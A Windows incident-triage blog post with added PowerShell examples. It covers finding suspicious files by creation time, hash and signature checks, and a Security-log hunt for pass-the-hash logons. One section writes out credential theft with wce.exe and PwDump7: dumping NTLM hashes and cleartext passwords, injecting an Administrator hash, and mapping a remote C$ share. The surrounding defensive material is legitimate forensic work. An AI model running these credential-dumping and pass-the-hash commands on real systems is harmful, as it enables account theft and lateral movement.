Thursday, 28 September 2017

Using dir to find suspicious files

Method 1 (using find)

First read the suspect file's creation time with /tc (dir then shows and sorts by the creation timestamp instead of the default last-write time):

 dir /tc malware
2017/01/01  下午 01:32  malware

(下午 01:32 is 01:32 PM; dir prints dates and times in the system locale's format, here Traditional Chinese.)

Then list every file on the drive, hidden and system files included, ordered by creation time, and keep only the lines whose timestamp starts with the same date, hour and tens digit of the minute. The prefix "01:3" turns the substring match into a ten-minute window, 13:30 to 13:39, around the malware's creation time:

dir /a  /s /tc /od c:\ | find "2017/01/01 下午 01:3"  (time range)

/a   include all attributes (hidden and system files too)
/s   recurse into subdirectories
/tc  display and sort by creation time
/od  oldest first; /o-d newest first

The string given to find has to match the dir output exactly, so it depends on the locale's date/time format and only allows windows of one minute, ten minutes or one hour. It is a quick triage filter, not a precise query. Creation times are also trivial to alter, so a file that falls outside the window is not cleared by this check.

To see the most recently created files under system32 first:

dir /a  /s /tc /o-d c:\windows\system32 |more
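The same triage in PowerShell, as an added example that is not part of the original post: comparing DateTime values instead of substring-matching the dir output removes the locale dependence and allows any window width, and showing all three timestamps side by side makes obvious anomalies visible. The window boundaries and the root path are assumptions chosen to mirror the commands above.

```powershell
# Added example (not from the original post): files whose NTFS creation time
# falls in a window, the PowerShell equivalent of
#   dir /a /s /tc /od c:\ | find "2017/01/01 下午 01:3"
# Window boundaries and root path are assumptions; adjust to the case.
$Start = Get-Date '2017-01-01 13:30:00'
$End   = Get-Date '2017-01-01 13:40:00'
$Root  = 'C:\Windows\System32'

# -Force includes hidden/system files (dir /a); -Recurse walks subdirectories (dir /s).
# -ErrorAction SilentlyContinue skips directories we cannot read instead of aborting.
$hits = Get-ChildItem -Path $Root -File -Recurse -Force -ErrorAction SilentlyContinue |
    Where-Object { $_.CreationTime -ge $Start -and $_.CreationTime -lt $End }

# Show created / modified / accessed together. Timestamps are easy to forge
# (SetFileTime), so treat a "clean" window as triage output, not a verdict;
# when in doubt compare against the $FILE_NAME timestamps in the MFT.
$hits |
    Sort-Object CreationTime |
    Select-Object FullName, Length, CreationTime, LastWriteTime, LastAccessTime |
    Format-Table -AutoSize

# Newest-created files first, the equivalent of dir /a /s /tc /o-d ... | more
Get-ChildItem -Path $Root -File -Force -ErrorAction SilentlyContinue |
    Sort-Object CreationTime -Descending |
    Select-Object -First 20 FullName, CreationTime, LastWriteTime |
    Format-Table -AutoSize
```

Run it from an elevated prompt so protected directories are readable; widen or narrow `$Start`/`$End` freely, since nothing here depends on how the shell formats dates.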

*************************************************
Using wce.exe and PwDump7.exe

List the logon sessions on the box and the LM/NT hashes held for each:

wce.exe

Dump cleartext passwords from memory instead of hashes:

wce.exe -w

Dump the local account hashes from the SAM (pwdump format, user:RID:LM-hash:NT-hash:::):

PwDump7.exe
Administrator:500:xxxx

Inject the dumped Administrator hashes into the current logon session (the argument format is username:domain:lmhash:nthash):

wce.exe -s Administrator:test:xxxx

Then authenticate to the target's admin share with the injected credentials (pass-the-hash) rather than a password:

net use \\test\c$

Windows Credentials Editor (WCE) is a security tool to list logon sessions and add, change, list and delete associated credentials (ex.: LM/NT hashes, plaintext passwords and Kerberos tickets).

We have developed a new password dumper for Windows named PWDUMP7. The main difference between pwdump7 and other pwdump tools is that our tool runs by extracting the binary SAM and SYSTEM files from the filesystem and then the hashes are extracted. For that task Rkdetector NTFS and FAT32 filesystem drivers are used.

Pwdump 7 for Windows
Pwdump7 is also able to extract passwords offline by selecting the target files.
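The defender's view of the sequence above, as an added example that is not part of the original post: `wce.exe -s` followed by `net use \\test\c$` authenticates to the target over the network with NTLM, so the target records a 4624 logon of type 3 with authentication package NTLM and, if the File Share audit subcategory is enabled, a 5140 for `\\*\C$`. The event IDs and field names are standard Security-log fields; the 24-hour lookback is an assumption.

```powershell
# Added example (not from the original post): hunt on the *target* host for the
# footprint of "wce.exe -s <user>:<domain>:<lm>:<nt>" + "net use \\target\c$".
# 4624 (type 3, NTLM) and 5140 (share access) are standard Security-log events;
# the lookback window is an assumption.
$Since = (Get-Date).AddHours(-24)

function Get-EventField {
    param([System.Diagnostics.Eventing.Reader.EventLogRecord]$Event, [string]$Name)
    ([xml]$Event.ToXml()).Event.EventData.Data |
        Where-Object { $_.Name -eq $Name } |
        ForEach-Object { $_.'#text' }
}

# 4624: successful logon. Type 3 = network; NTLM package means no Kerberos
# ticket was used, which is what a hash replayed against a hostname or IP produces.
$netLogons = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4624; StartTime = $Since } |
    ForEach-Object {
        [pscustomobject]@{
            Time    = $_.TimeCreated
            User    = Get-EventField $_ 'TargetUserName'
            Domain  = Get-EventField $_ 'TargetDomainName'
            Type    = Get-EventField $_ 'LogonType'
            Package = Get-EventField $_ 'AuthenticationPackageName'
            Source  = Get-EventField $_ 'IpAddress'
            LogonId = Get-EventField $_ 'TargetLogonId'
        }
    } |
    Where-Object { $_.Type -eq '3' -and $_.Package -eq 'NTLM' }

# 5140: a network share object was accessed. Join on the logon ID so each
# C$/ADMIN$ access is tied to the NTLM logon that opened it.
$shareHits = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 5140; StartTime = $Since } -ErrorAction SilentlyContinue |
    ForEach-Object {
        [pscustomobject]@{
            Time    = $_.TimeCreated
            Share   = Get-EventField $_ 'ShareName'
            LogonId = Get-EventField $_ 'SubjectLogonId'
            Source  = Get-EventField $_ 'IpAddress'
        }
    } |
    Where-Object { $_.Share -match '\\\\\*\\(C|ADMIN)\$$' }

foreach ($hit in $shareHits) {
    $logon = $netLogons | Where-Object { $_.LogonId -eq $hit.LogonId } | Select-Object -First 1
    if ($logon) {
        '{0}  {1}\{2} from {3} opened {4} via NTLM' -f $hit.Time, $logon.Domain, $logon.User, $hit.Source, $hit.Share
    }
}
```

A legitimate administrator mapping C$ with a real password from a workgroup machine produces the same two events, so the output is a lead to qualify by source host, account and time of day, not a verdict on its own. The 5140 half is empty unless "Audit File Share" is turned on.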


*************************************************
cfc.exe is CompFileChecker, by H.KINOSHITA, version 0.0.2.0, 609,792 bytes. Do not take generic "cfc.exe virus or errors should be disabled and removed" pages as a verdict on a binary of that name; identify the actual file by size, version information, digital signature and hash, and compare it against a known-good copy.

Invoked here with two file arguments, the suspect algx.exe and c:\windows\winhelp.exe:

cfc.exe algx.exe c:\windows\winhelp.exe
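The checks that should precede (or replace) a byte-for-byte compare with a third-party tool, as an added example that is not part of the original post: hash, Authenticode status and version resource for both files, using only built-in cmdlets. The two paths are taken from the command above; everything about what those files actually are is left to the output.

```powershell
# Added example (not from the original post): establish what a suspect binary
# is before trusting a file-compare tool's verdict. Paths come from the note
# above; nothing about the files' identity is assumed.
$Suspect   = 'algx.exe'
$Reference = 'C:\Windows\winhelp.exe'

foreach ($path in $Suspect, $Reference) {
    $item = Get-Item -Path $path
    $sig  = Get-AuthenticodeSignature -FilePath $path
    [pscustomobject]@{
        File        = $item.FullName
        Size        = $item.Length
        SHA256      = (Get-FileHash -Algorithm SHA256 -Path $path).Hash
        SigStatus   = $sig.Status                     # Valid / NotSigned / HashMismatch ...
        Signer      = $sig.SignerCertificate.Subject  # empty when unsigned
        Description = $item.VersionInfo.FileDescription
        Company     = $item.VersionInfo.CompanyName
        Version     = $item.VersionInfo.FileVersion
    }
}

# Byte-for-byte equivalence: equal SHA-256 digests mean identical content.
$same = (Get-FileHash -Algorithm SHA256 -Path $Suspect).Hash -eq
        (Get-FileHash -Algorithm SHA256 -Path $Reference).Hash
"Identical content: $same"
```

A `HashMismatch` signature status on a file that carries Microsoft version strings is the single most useful line here: the version resource is just text an attacker can copy, the signature is not.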


